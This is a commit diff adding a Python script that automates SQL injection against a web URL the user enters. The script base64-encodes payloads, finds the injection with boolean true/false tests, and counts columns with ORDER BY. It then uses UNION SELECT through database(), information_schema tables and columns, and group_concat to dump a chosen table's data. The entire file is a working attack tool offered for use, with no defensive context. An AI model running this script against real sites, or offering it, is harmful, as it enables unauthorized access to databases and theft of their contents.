
Commit 7e9e942

authored
Add files via upload
1 parent 34609a0 commit 7e9e942

1 file changed

Lines changed: 72 additions & 0 deletions

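--- a/base64 _injection.py
+++ b/base64 _injection.py
@@ -0,0 +1,72 @@
+import requests
+import base64
+import binascii
+def sql_injection():
+uc=input('Please url:')
+ids=input('id:')
+payload=base64.b64encode(bytes('{} and 1=1'.format(ids),encoding='utf-8'))
+payload2=base64.b64encode(bytes('{} and 1=2'.format(ids),encoding='utf-8'))
+payload3=base64.b64encode(bytes('{} order by 1'.format(ids),encoding='utf-8'))
+urls='{}'.format(uc)
+headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}
+rqt=requests.get(url=urls+bytes.decode(payload),headers=headers)
+rqt2=requests.get(url=urls + bytes.decode(payload2), headers=headers)
+if rqt.text!=rqt2.text:
+print('[+] There is SQL injection.')
+rqt3=requests.get(url=urls+bytes.decode(payload3),headers=headers)
+if rqt.text==rqt3.text:
+print('[+] Try running fields')
+for i in range(1,101):
+payload3=base64.b64encode(bytes('{} order by {}'.format(ids,i),encoding='utf-8'))
+rqt3=requests.get(url=urls+bytes.decode(payload3),headers=headers)
+if rqt3.text!=rqt.text:
+global field
+field=i-1
+print('[+] field:{}'.format(i-1))
+payload3=base64.b64encode(bytes('{} order by {}'.format(ids,field), encoding='utf-8'))
+print('[+] payload 3:{}'.format(bytes.decode(base64.b64decode(payload3))))
+break
+
+if field!='':
+xj=open('sqldk.txt','w')
+xj.close()
+for u in range(1,field+1):
+print(','+str(u),end='',file=open('sqldk.txt','a'))
+with open('sqldk.txt','r') as p:
+reads=p.read().replace(',1','1')
+payload4=base64.b64encode(bytes('0 union select {}'.format(reads),encoding='utf-8'))
+print('[+] obtain payload 4:',bytes.decode(base64.b64decode(payload4)))
+rqt4=requests.get(url=urls+bytes.decode(payload4),headers=headers)
+print('[+] Open URL to manually locate the display:',rqt4.url)
+user=input('display:')
+print('[+] The number of digits you enter is:',user)
+payload4=bytes.decode(base64.b64decode(payload4)).replace(user,'database()')
+rqt5=requests.get(url=urls+bytes.decode(base64.b64encode(bytes(payload4,encoding='utf-8'))),headers=headers)
+print('[+] Manually open the URL to get the database name:',rqt5.url)
+user2=input('database:')
+js=binascii.hexlify(bytes(user2,encoding='utf-8'))
+js='0x{}'.format(bytes.decode(js))
+payload5=base64.b64encode(bytes(payload4.replace('database()','group_concat(table_name)')+' '+'from information_schema.tables where table_schema={}'.format(js),encoding='utf-8'))
+rqt6=requests.get(url=urls+bytes.decode(payload5),headers=headers)
+if rqt6.status_code==200:
+print('[+] Open the URL input field:',rqt6.url)
+user3=input('table_name:')
+payload6=bytes.decode(base64.b64decode(payload5)).replace('table_name','column_name').replace('tables','columns')+' and table_name={}'.format('0x'+bytes.decode(binascii.hexlify(bytes(user3,encoding='utf-8'))))
+payload6=base64.b64encode(bytes(payload6,encoding='utf-8'))
+rqt7=requests.get(url=urls+bytes.decode(payload6),headers=headers)
+if rqt7.status_code==200:
+print('[+] Open URL input field name:',rqt7.url)
+print('[+] If there are multiple field names, separate them')
+user4=input('column_name:')
+payload7=base64.b64encode(bytes('0 union select '+reads.replace(user,'group_concat({})'.format(user4))+' from {}'.format(user3),encoding='utf-8'))
+rqt8=requests.get(url=urls+bytes.decode(payload7),headers=headers)
+if rqt8.status_code==200:
+print('[+] Completed injection:',rqt8.url)
+
+
+
+else:
+print('[-] No SQL injection exists.')
+exit()
+if __name__ == '__main__':
+sql_injection()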
